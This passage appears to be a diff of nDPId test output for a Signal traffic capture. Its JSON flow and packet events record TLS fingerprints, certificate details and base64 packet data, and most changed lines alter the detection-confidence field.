{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569051248547,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051248547,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTAAAP8RkXUAAAAA\/\/\/\/\/wBEAEMBNJw9AQEGACG6jqoABAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569051253252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051253252,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTEAAP8RkXQAAAAA\/\/\/\/\/wBEAEMBNJw4AQEGACG6jqoACQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABiAABAAEAG01TAqAIREfiSkN6kAbu8mMGjrFDpOoAYBADERQAAAQEICihVb2TeKRePFwMDACkAAAAAAAAAByneD5KHf7LhXiN5Pdq3wP31zhE4MGciEgckOq75+f9F5w=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABTAABAAEAG02PAqAIREfiSkN6kAbu8mMHRrFDpOoAYBABt7AAAAQEICihVb2XeKRePFQMDABoAAAAAAAAACJW1v\/IhTp91V+O68DpoE88kag=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG04LAqAIREfiSkN6kAbu8mMHwrFDpOoARBACJkgAAAQEICihVb2XeKReP"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAABLAABAAEAGjWvAqAIRAhLodt65Absqy4Q4WMZypYAYBABE5AAAAQEICihVdq6vX9qZFQMDABKEOlUEciue5QZs7g3+sWQHUk8="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGjYLAqAIRAhLodt65Absqy4RPWMZypYARBABBggAAAQEICihVdq6vX9qZ"} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1569051257192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257192,"pkt":"xGGLNYKpxiwDYGpkCABFAABL884AADUG5JwCEuh2wKgCEQG73rlYxnKlKsuET4AYAQIBNAAAAQEICq9gUAcoVXauFQMDABK6ebhIWf6gqCdSaZoYDdKf06A="} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264073,"flow_last_seen":1569051264073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -60,7 +60,7 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569051264078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264078,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN6+AbvH3a+JAAAAALAC\/\/8ydQAAAgQFtAEDAwcBAQgKKFWSTQAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 